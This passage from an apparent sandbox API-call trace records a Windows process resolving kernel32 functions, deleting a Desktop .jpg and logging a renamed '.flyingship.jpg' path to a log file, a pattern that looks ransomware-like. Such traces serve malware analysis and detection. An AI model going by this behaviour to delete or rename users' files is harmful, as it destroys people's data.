0x76df58 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.194] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0076.194] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e2e8 [0076.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x76e2e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0076.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f5bqoll3uym0camplpj.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0076.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0076.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0076.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0076.196] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.196] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.196] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.196] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0076.196] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0076.196] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0076.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0076.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0076.197] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa) returned 0x76abc8 [0076.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x76abc8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0076.198] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.198] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.198] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.198] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0076.198] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0076.198] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.198] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.199] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.199] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0076.199] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0076.199] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0076.199] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0076.199] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0076.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.199] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e000 [0076.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e000, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.200] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.200] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.200] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0076.200] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0076.200] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0076.200] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.200] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0076.200] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0076.200] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.200] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0076.200] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.200] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.200] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.200] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg", lpFilePart=0x0) returned 0x3e [0076.201] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb264fec0, ftCreationTime.dwHighDateTime=0x1d5ddb5, ftLastAccessTime.dwLowDateTime=0xf6077c70, ftLastAccessTime.dwHighDateTime=0x1d5e5fd, ftLastWriteTime.dwLowDateTime=0xca31b200, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x13eeb, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="6F5BQoLL3Uym0CamPlpJ.jpg", cAlternateFileName="6F5BQO~1.JPG")) returned 0x6b89f8 [0076.201] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6f5bqoll3uym0camplpj.jpg")) returned 1 [0076.203] FindNextFileW (in: hFindFile=0x6b89f8, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb264fec0, ftCreationTime.dwHighDateTime=0x1d5ddb5, ftLastAccessTime.dwLowDateTime=0xf6077c70, ftLastAccessTime.dwHighDateTime=0x1d5e5fd, ftLastWriteTime.dwLowDateTime=0xca31b200, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x13eeb, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="6F5BQoLL3Uym0CamPlpJ.jpg", cAlternateFileName="6F5BQO~1.JPG")) returned 0 [0076.203] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0076.203] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.204] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9c8 [0076.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0076.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0076.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0076.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0076.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0076.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0076.204] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0076.204] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.204] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.205] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.205] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.205] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0076.205] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.205] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.206] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0076.206] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.206] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0076.206] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.206] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0076.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0076.206] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.206] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0076.206] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x35e, lpOverlapped=0x0) returned 1 [0076.207] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0076.207] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x35e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.207] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0076.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.207] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0076.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0076.207] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.flyingship.jpg\r\n", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0076.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4c) returned 0x6d3530 [0076.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.flyingship.jpg\r\n", cchWideChar=76, lpMultiByteStr=0x6d3530, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.flyingship.jpg\r\n", lpUsedDefaultChar=0x0) returned 76 [0076.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.208] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0076.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0076.208] WriteFile (in: hFile=0x140, lpBuffer=0x6d34d8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x6d34d8*, lpNumberOfBytesWritten=0x61eef4*=0x4b, lpOverlapped=0x0) returned 1 [0076.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0076.208] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.208] CloseHandle (hObject=0x140) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1b20 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0076.209] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0076.209] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.209] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 